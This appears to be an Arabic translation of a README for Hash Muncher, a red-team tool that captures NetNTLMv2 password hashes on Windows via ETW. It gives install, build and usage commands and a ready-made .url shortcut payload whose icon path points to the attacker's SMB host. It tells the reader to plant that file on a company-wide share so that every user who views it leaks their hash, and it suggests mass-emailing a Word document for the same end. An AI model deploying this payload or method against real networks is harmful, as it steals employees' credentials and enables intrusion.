
التقط هاشات NetNTLMv2 باستخدام ETW بصلاحيات إدارية على Windows 8.1 / Windows Server 2016 والإصدارات الأحدث
التقط تجزئات NetNTLMv2 باستخدام ETW بصلاحيات إدارية على ويندوز
ثلاثة خيارات مختلفة لتشغيله
go install github.com/lkarlslund/hashmuncher@latest
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1
تأكد من أن جدار حماية ويندوز يسمح بـ"مشاركة الملفات والطابعات"، لأن Hash Muncher يتطلب خدمة SMB المدمجة لإرسال واستقبال الطلب الأولي وحزم الاستجابة إلى الهدف.
في موجه أوامر بصلاحيات مرتفعة، شغّل Hash Muncher
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1
استبدل عنوان IP بعنوان جهاز Hash Muncher الخاص بك، واحفظ الملف في مشاركة ملفات (على مستوى الشركة) بالاسم 'whatever.url'، وشاهد التجزئات تنهال عليك.
توجد طرق أخرى مذكورة في Red Team Notes - المصادقة القسرية، ويمكنك على الأرجح أيضًا أن تحقق نجاحًا بإرسال مستند Word للجميع عبر البريد، لكنه ليس أسلوبًا خفيًا إطلاقًا.
لقد كنت أتلاعب بـ ETW بين الحين والآخر، لكن بمجرد أن رأيت البحث الرائع من Nettitude Labs عرفت أنه يجب أن أحوّل هذا إلى أداة سهلة الاستخدام بلغتي المفضلة Golang! لدى Nettitude Labs إثبات مفهوم POC عامل مكتوب بلغة C# ويعمل ضمن إطار عمل .Net، وقد يكون خيارًا أفضل لك. لذا أنا لا أخترع شيئًا جديدًا هنا، بل أضيف هذه الأداة كبديل.
إذا كنت تهتم بأمان ويندوز، فقد تعجبك أيضًا أداة مخططات الهجمات الخاصة بي Adalanche